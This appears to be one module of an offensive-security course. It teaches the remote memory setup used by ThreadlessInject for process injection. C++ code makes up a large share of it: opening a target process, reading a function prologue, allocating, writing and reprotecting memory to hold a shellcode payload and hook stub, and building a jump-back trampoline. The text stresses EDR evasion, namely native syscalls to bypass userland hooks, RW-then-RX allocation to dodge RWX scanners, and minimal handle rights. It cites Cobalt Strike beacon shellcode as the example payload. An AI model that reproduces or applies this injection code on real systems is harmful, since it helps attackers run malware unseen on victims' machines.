Difficulty: Intermediate

Module 4: Memory Allocation in Remote Process

Before you can hook anything, you need memory in the target process for your shellcode and stub.

What Gets Written Where

ThreadlessInject needs to place three things into the target process: (1) the shellcode payload, (2) the hook stub that saves/restores registers and calls the shellcode, and (3) the saved original bytes from the hooked function along with a jump back. All of these are written into a single allocated memory region in the target process using cross-process memory APIs.

Cross-Process Memory Allocation

To allocate memory in another process, you use NtAllocateVirtualMemory with the target process handle. This is the native API equivalent of VirtualAllocEx but operates at the syscall level, bypassing any userland hooks that EDR products may have placed on kernel32.dll.

C++// NtAllocateVirtualMemory - allocate memory in the remote process
// This is what ThreadlessInject uses instead of VirtualAllocEx

typedef NTSTATUS (NTAPI *pNtAllocateVirtualMemory)(
    HANDLE    ProcessHandle,   // Target process handle
    PVOID    *BaseAddress,     // In/out: desired/actual base address
    ULONG_PTR ZeroBits,        // Number of high-order zero bits in address
    PSIZE_T   RegionSize,      // In/out: desired/actual size
    ULONG     AllocationType,  // MEM_COMMIT | MEM_RESERVE
    ULONG     Protect          // PAGE_READWRITE initially
);

// Usage in ThreadlessInject:
// IMPORTANT: The actual tool allocates within +/- 2GB of the target export
// to enable a 5-byte relative CALL (E8). It scans addresses near the target.
PVOID remoteBase = NULL;
SIZE_T regionSize = shellcodeLen + stubLen + originalBytesLen + 256; // padding

NTSTATUS status = NtAllocateVirtualMemory(
    hProcess,                       // Target process handle
    &remoteBase,                    // Desired base near target function
    0,                              // No zero-bit constraints
    &regionSize,                    // Total size needed
    MEM_COMMIT | MEM_RESERVE,       // Commit immediately
    PAGE_READWRITE                  // Start as RW (not executable yet)
);

The 2GB Allocation Constraint

Because ThreadlessInject uses a 5-byte relative CALL instruction (opcode E8) to redirect execution, the shellcode loader must be allocated within +/- 2GB of the target function. The actual tool scans memory regions near the target export address, attempting allocation at each candidate until one succeeds. This is a key operational constraint: if no suitable memory hole exists within range, the injection fails.

Initial Protection: RW, Not RWX

Notice that the allocation uses PAGE_READWRITE, not PAGE_EXECUTE_READWRITE. Allocating RWX memory directly is a significant red flag that memory scanners detect. ThreadlessInject allocates as RW, writes all the data, and then changes the protection to RX (read-execute) before installing the hook. This avoids the RWX signature entirely and is a common evasion technique.

Memory Layout in the Remote Process

ThreadlessInject organizes the allocated memory region with a specific layout. The hook stub comes first, followed by the shellcode payload, followed by the saved original bytes and the jump-back instruction:

Remote Memory Region Layout

Hook Stub (~50 bytes)
Save registers → call shellcode → restore registers
Shellcode Payload (variable size)
The actual payload (e.g., Cobalt Strike beacon shellcode)
Original Bytes (14 bytes saved from hooked function)
The overwritten prologue instructions
Jump-Back (14 bytes)
JMP [RIP+0] + address of HookedFunc+14

This layout is contiguous in memory, which means a single allocation and a single write operation can place everything. The hook stub knows the relative offset to the shellcode (it is immediately after the stub), and the original bytes block knows it must jump to hookedFunction + 14 to resume normal execution.

Writing Data to the Remote Process

After allocation, you write the complete payload into the remote memory region using NtWriteVirtualMemory:

C++// Step 1: Build the complete payload locally
// Combine hook stub + shellcode + original bytes + jump-back into one buffer
BYTE* localBuffer = (BYTE*)malloc(regionSize);

// Copy hook stub at offset 0
memcpy(localBuffer, hookStub, hookStubLen);

// Copy shellcode immediately after
memcpy(localBuffer + hookStubLen, shellcode, shellcodeLen);

// Copy saved original bytes after shellcode
memcpy(localBuffer + hookStubLen + shellcodeLen, originalBytes, 14);

// Build jump-back to hookedFunc + 14
BYTE jumpBack[14];
jumpBack[0] = 0xFF; jumpBack[1] = 0x25;                    // JMP [RIP+0]
*(DWORD*)(jumpBack + 2) = 0;                                // RIP-relative offset = 0
*(UINT64*)(jumpBack + 6) = (UINT64)hookedFuncAddr + 14;     // Target: original func + 14
memcpy(localBuffer + hookStubLen + shellcodeLen + 14, jumpBack, 14);

// Step 2: Write the complete buffer to the remote process
SIZE_T bytesWritten = 0;
NtWriteVirtualMemory(
    hProcess,           // Target process
    remoteBase,         // Destination (allocated earlier)
    localBuffer,        // Source (our local buffer)
    regionSize,         // Total size
    &bytesWritten       // Bytes actually written
);

Memory Protection Management

After writing, the memory must be changed from PAGE_READWRITE to PAGE_EXECUTE_READ. This is done with NtProtectVirtualMemory:

C++// Change protection: RW -> RX (read + execute, no write)
ULONG oldProtect = 0;
PVOID protectBase = remoteBase;
SIZE_T protectSize = regionSize;

NtProtectVirtualMemory(
    hProcess,           // Target process
    &protectBase,       // Address to change
    &protectSize,       // Size of region
    PAGE_EXECUTE_READ,  // New protection: RX
    &oldProtect         // Previous protection stored here
);
// Now the region is executable but not writable
// The shellcode and hook stub can execute but cannot be easily modified

This two-step approach (allocate RW, write, change to RX) is a standard evasion pattern. It means at no point does the memory have simultaneous write and execute permissions, avoiding the RWX detection heuristic used by tools like Moneta.

Process Handle Requirements

All these cross-process operations require a handle to the target process with specific access rights. Here is the minimum set of rights needed:

Access RightConstantPurpose
VM OperationPROCESS_VM_OPERATIONRequired for NtAllocateVirtualMemory and NtProtectVirtualMemory
VM WritePROCESS_VM_WRITERequired for NtWriteVirtualMemory
VM ReadPROCESS_VM_READRequired for NtReadVirtualMemory (reading original bytes)
C++// Opening the target process with minimum required rights
// ThreadlessInject uses NtOpenProcess (not kernel32 OpenProcess) for stealth
OBJECT_ATTRIBUTES oa = {sizeof(OBJECT_ATTRIBUTES)};
CLIENT_ID cid = {(HANDLE)(ULONG_PTR)targetPid, NULL};
HANDLE hProcess = NULL;

NtOpenProcess(
    &hProcess,
    PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ,
    &oa,
    &cid
);
// Note: PROCESS_ALL_ACCESS works but is more suspicious
// Using minimum rights reduces the detection surface

Detection Consideration: Handle Access Rights

EDR products monitor OpenProcess (via the kernel callback ObRegisterCallbacks) and flag processes that request suspicious access rights combinations. Requesting PROCESS_ALL_ACCESS to another process is an obvious red flag. Requesting specifically PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ is less common in legitimate software and still suspicious, but slightly less conspicuous than full access. Some operators combine ThreadlessInject with handle duplication or handle inheritance techniques to avoid the OpenProcess call entirely.

Reading the Original Function Bytes

Before overwriting the target function's prologue with the hook JMP, you must save the original bytes. These are needed both for the trampoline (to execute them after the hook) and for the cleanup phase (to restore them after the shellcode runs once):

C++// Read the first 14 bytes of the target function in the remote process
BYTE originalBytes[14] = {0};
SIZE_T bytesRead = 0;

NtReadVirtualMemory(
    hProcess,                    // Target process
    (PVOID)hookedFuncAddr,       // Address of target function
    originalBytes,               // Buffer to store original bytes
    14,                          // Read 14 bytes
    &bytesRead                   // Actual bytes read
);

// These 14 bytes will be:
// 1. Embedded in the trampoline (to execute after hook code)
// 2. Stored by the hook stub for restoration after first execution

Summary: The Memory Setup Sequence

The complete memory setup for ThreadlessInject follows this order: (1) Open the target process handle with VM rights. (2) Read the original 14 bytes from the target function. (3) Allocate a RW memory region in the target process. (4) Build the local buffer containing hook stub + shellcode + original bytes + jump-back. (5) Write the buffer to the remote allocation. (6) Change the protection from RW to RX. The allocated region is now ready, and the next step (Module 6) is to install the actual hook by overwriting the target function's prologue.

Pop Quiz: Remote Memory Allocation

Q1: Why does ThreadlessInject allocate memory as PAGE_READWRITE and then change it to PAGE_EXECUTE_READ?

Memory scanners like Moneta flag PAGE_EXECUTE_READWRITE (RWX) regions because legitimate programs rarely need them. By allocating as RW (writable but not executable), writing the payload, and then switching to RX (executable but not writable), ThreadlessInject ensures the memory is never simultaneously writable and executable.

Q2: What process access rights are required for NtAllocateVirtualMemory on a remote process?

NtAllocateVirtualMemory and NtProtectVirtualMemory require PROCESS_VM_OPERATION. NtWriteVirtualMemory additionally requires PROCESS_VM_WRITE, and NtReadVirtualMemory requires PROCESS_VM_READ. Notably, PROCESS_CREATE_THREAD is NOT needed since ThreadlessInject never creates a thread.

Q3: In the remote memory layout, what comes immediately after the shellcode payload?

The memory layout is: hook stub, then shellcode, then the 14 saved original bytes from the hooked function's prologue, then a 14-byte JMP instruction that jumps back to the hooked function at offset +14 (continuing where the overwritten bytes left off).